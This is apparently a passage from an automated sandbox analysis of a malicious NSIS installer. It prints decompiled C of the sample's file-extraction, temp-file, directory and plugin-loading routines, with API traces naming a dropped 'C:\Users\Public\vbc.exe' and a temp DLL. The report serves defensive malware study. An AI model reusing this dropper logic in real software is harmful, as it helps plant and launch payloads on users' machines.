                                                					return _t49;
                                                				}
                                                				E00404E84(0xffffffea,  *(_t85 - 0xc));
                                                				 *0x423ff4 =  *0x423ff4 + 1;
                                                				_push(_t75);
                                                				_push(_t75);
                                                				_push( *(_t85 - 8));
                                                				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                				_t43 = E00402E8E(); // executed
                                                				 *0x423ff4 =  *0x423ff4 - 1;
                                                				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                				_t80 = _t43;
                                                				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t85 - 8)); // executed
                                                				__eflags = _t80 - _t75;
                                                				if(_t80 >= _t75) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t80 - 0xfffffffe;
                                                					if(_t80 != 0xfffffffe) {
                                                						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
                                                					} else {
                                                						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
                                                						lstrcatA(0x409c10,  *(_t85 - 0xc));
                                                					}
                                                					_push(0x200010);
                                                					_push(0x409c10);
                                                					E00405459();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}

















                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,pnzipglt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                • CompareFileTime.KERNEL32(-00000014,?,pnzipglt,pnzipglt,00000000,00000000,pnzipglt,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                  • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,kozkonzcvlkexzh Setup,NSIS Error), ref: 00405BA5
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                 • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                 • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsf86CE.tmp$C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll$pnzipglt
                                                • API String ID: 1941528284-2953776142
                                                • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				long _v12;
                                                				long _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				char _v88;
                                                				void* _t62;
                                                				void* _t63;
                                                				intOrPtr _t74;
                                                				long _t75;
                                                				int _t78;
                                                				void* _t88;
                                                				intOrPtr _t91;
                                                				void* _t93;
                                                				long _t96;
                                                				signed int _t97;
                                                				long _t98;
                                                				int _t99;
                                                				void* _t100;
                                                				long _t101;
                                                				void* _t102;
                                                
                                                				_t97 = _a16;
                                                				_t93 = _a12;
                                                				_v12 = _t97;
                                                				if(_t93 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_t88 = _t93;
                                                				if(_t93 == 0) {
                                                					_t88 = 0x40f0e0;
                                                				}
                                                				_t60 = _a4;
                                                				if(_a4 >= 0) {
                                                					_t91 =  *0x423f98; // 0x9889
                                                					E004030B3(_t91 + _t60);
                                                				}
                                                				_t62 = E00403081( &_a16, 4); // executed
                                                				if(_t62 == 0) {
                                                					L34:
                                                					_push(0xfffffffd);
                                                					goto L35;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t93 == 0) {
                                                							while(_a16 > 0) {
                                                								_t98 = _v12;
                                                								if(_a16 < _t98) {
                                                									_t98 = _a16;
                                                								}
                                                								if(E00403081(0x40b0e0, _t98) == 0) {
                                                									goto L34;
                                                								} else {
                                                									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
                                                										L29:
                                                										_push(0xfffffffe);
                                                										L35:
                                                										_pop(_t63);
                                                										return _t63;
                                                									} else {
                                                										_v8 = _v8 + _t98;
                                                										_a16 = _a16 - _t98;
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							L45:
                                                							return _v8;
                                                						}
                                                						if(_a16 < _t97) {
                                                							_t97 = _a16;
                                                						}
                                                						if(E00403081(_t93, _t97) != 0) {
                                                							_v8 = _t97;
                                                							goto L45;
                                                						} else {
                                                							goto L34;
                                                						}
                                                					}
                                                					_v16 = GetTickCount();
                                                					E00406005(0x40b050);
                                                					_t13 =  &_a16;
                                                					 *_t13 = _a16 & 0x7fffffff;
                                                					_a4 = _a16;
                                                					if( *_t13 <= 0) {
                                                						goto L45;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t99 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t99 = _a16;
                                                						}
                                                						if(E00403081(0x40b0e0, _t99) == 0) {
                                                							goto L34;
                                                						}
                                                						_a16 = _a16 - _t99;
                                                						 *0x40b068 = 0x40b0e0;
                                                						 *0x40b06c = _t99;
                                                						while(1) {
                                                							 *0x40b070 = _t88;
                                                							 *0x40b074 = _v12; // executed
                                                							_t74 = E00406025(0x40b050); // executed
                                                							_v24 = _t74;
                                                							if(_t74 < 0) {
                                                								break;
                                                							}
                                                							_t100 =  *0x40b070; // 0x40f0e0
                                                							_t101 = _t100 - _t88;
                                                							_t75 = GetTickCount();
                                                							_t96 = _t75;
                                                							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
                                                								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t102 = _t102 + 0xc;
                                                								E00404E84(0,  &_v88);
                                                								_v16 = _t96;
                                                							}
                                                							if(_t101 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L45;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_v8 = _v8 + _t101;
                                                									_v12 = _v12 - _t101;
                                                									_t88 =  *0x40b070; // 0x40f0e0
                                                									L24:
                                                									if(_v24 != 1) {
                                                										continue;
                                                									}
                                                									goto L45;
                                                								}
                                                								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
                                                								if(_t78 == 0 || _v20 != _t101) {
                                                									goto L29;
                                                								} else {
                                                									_v8 = _v8 + _t101;
                                                									goto L24;
                                                								}
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L35;
                                                					}
                                                					goto L34;
                                                				}
                                                			}

                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                                • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                                • MulDiv.KERNEL32 ref: 00402F9A
                                                • wsprintfA.USER32 ref: 00402FAA
                                                • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountTick$FileWritewsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 4209647438-2449383134
                                                • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405346(CHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x40735c;
                                                				_v36.Group = 0x40735c;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x40734c;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}

                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                • GetLastError.KERNEL32 ref: 0040539D
                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                • GetLastError.KERNEL32 ref: 004053BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\Public$Ls@$\s@
                                                • API String ID: 3449924974-3509358640
                                                • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405EBA(intOrPtr _a4) {
                                                				char _v292;
                                                				int _t10;
                                                				struct HINSTANCE__* _t14;
                                                				void* _t16;
                                                				void* _t21;
                                                
                                                				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                				if(_t10 > 0x104) {
                                                					_t10 = 0;
                                                				}
                                                				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                					_t16 = 1;
                                                				} else {
                                                					_t16 = 0;
                                                				}
                                                				_t5 = _t16 + 0x409010; // 0x5c
                                                				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                				return _t14;
                                                			}

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                • wsprintfA.USER32 ref: 00405F0A
                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%s.dll$UXTHEME$\
                                                • API String ID: 2200240437-4240819195
                                                • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000), ref: 1001B2DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: D
                                                • API String ID: 963392458-2746444292
                                                • Opcode ID: 05133a947883a0759d5254c9c3fbe27d78fde27710d70e722874f7e6d04a51fe
                                                • Instruction ID: 1f7050914af006cb7462d9d4da03dbaed304e31c24ddbe51fbec48b7391dd11a
                                                • Opcode Fuzzy Hash: 05133a947883a0759d5254c9c3fbe27d78fde27710d70e722874f7e6d04a51fe
                                                • Instruction Fuzzy Hash: 25A1C174E04609AFDB50DFA4C985BADBBF5EF08344F208465E915EB291E730EA81DF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                				signed int _t11;
                                                				int _t14;
                                                				signed int _t16;
                                                				void* _t19;
                                                				CHAR* _t20;
                                                
                                                				_t20 = _a4;
                                                				_t19 = 0x64;
                                                				while(1) {
                                                					_t19 = _t19 - 1;
                                                					_a4 = 0x61736e;
                                                					_t11 = GetTickCount();
                                                					_t16 = 0x1a;
                                                					_a6 = _a6 + _t11 % _t16;
                                                					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                					if(_t14 != 0) {
                                                						break;
                                                					}
                                                					if(_t19 != 0) {
                                                						continue;
                                                					}
                                                					 *_t20 =  *_t20 & 0x00000000;
                                                					return _t14;
                                                				}
                                                				return _t20;
                                                			}

                                                APIs
                                                • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                                • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1498418707
                                                • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A9AC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 001ebef15b0206ca0fcb44dfa8cbf1268c027215aea593ba9889f6cc766d45c8
                                                • Instruction ID: 370712f530380b5801cd0399227dc53b8984abf9dd23a4cc290a1da1f4a01a83
                                                • Opcode Fuzzy Hash: 001ebef15b0206ca0fcb44dfa8cbf1268c027215aea593ba9889f6cc766d45c8
                                                • Instruction Fuzzy Hash: 19712935E50348AADB60CBE4E956BEDB7B5EF48710F20841AE508EE2E0E7705E81DB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00401F84(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t18;
                                                				struct HINSTANCE__* _t26;
                                                				void* _t27;
                                                				struct HINSTANCE__* _t30;
                                                				CHAR* _t32;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t27 = __ebx;
                                                				asm("sbb eax, 0x423ff8");
                                                				 *(_t34 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
                                                					return 0;
                                                				}
                                                				_t32 = E00402A29(0xfffffff0);
                                                				 *(_t34 + 8) = E00402A29(1);
                                                				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                					L3:
                                                					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                					_t30 = _t18;
                                                					if(_t30 == _t27) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                					if(_t33 == _t27) {
                                                						E00404E84(0xfffffff7,  *(_t34 + 8));
                                                					} else {
                                                						 *(_t34 - 4) = _t27;
                                                						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                							if( *_t33() != 0) {
                                                								 *(_t34 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
                                                						FreeLibrary(_t30);
                                                					}
                                                					goto L16;
                                                				}
                                                				_t26 = GetModuleHandleA(_t32); // executed
                                                				_t30 = _t26;
                                                				if(_t30 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}











                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2987980305-0
                                                • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004015B3(char __ebx) {
                                                				void* _t13;
                                                				int _t19;
                                                				char _t21;
                                                				void* _t22;
                                                				char _t23;
                                                				signed char _t24;
                                                				char _t26;
                                                				CHAR* _t28;
                                                				char* _t32;
                                                				void* _t33;
                                                
                                                				_t26 = __ebx;
                                                				_t28 = E00402A29(0xfffffff0);
                                                				_t13 = E0040571F(_t28);
                                                				_t30 = _t13;
                                                				if(_t13 != __ebx) {
                                                					do {
                                                						_t32 = E004056B6(_t30, 0x5c);
                                                						_t21 =  *_t32;
                                                						 *_t32 = _t26;
                                                						 *((char*)(_t33 + 0xb)) = _t21;
                                                						if(_t21 != _t26) {
                                                							L5:
                                                							_t22 = E004053C3(_t28);
                                                						} else {
                                                							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t22 = E00405346(_t28); // executed
                                                							}
                                                						}
                                                						if(_t22 != _t26) {
                                                							if(_t22 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                							} else {
                                                								_t24 = GetFileAttributesA(_t28); // executed
                                                								if((_t24 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                						 *_t32 = _t23;
                                                						_t30 = _t32 + 1;
                                                					} while (_t23 != _t26);
                                                				}
                                                				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
                                                					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                					if(_t19 == 0) {
                                                						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
                                                				return 0;
                                                			}














                                                APIs
                                                  • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                  • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 1892508949-2935972921
                                                • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 99%
                                                			E00406609() {
                                                				signed int _t530;
                                                				void _t537;
                                                				signed int _t538;
                                                				signed int _t539;
                                                				unsigned short _t569;
                                                				signed int _t579;
                                                				signed int _t607;
                                                				void* _t627;
                                                				signed int _t628;
                                                				signed int _t635;
                                                				signed int* _t643;
                                                				void* _t644;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t530 =  *(_t644 - 0x30);
                                                					if(_t530 >= 4) {
                                                					}
                                                					 *(_t644 - 0x40) = 6;
                                                					 *(_t644 - 0x7c) = 0x19;
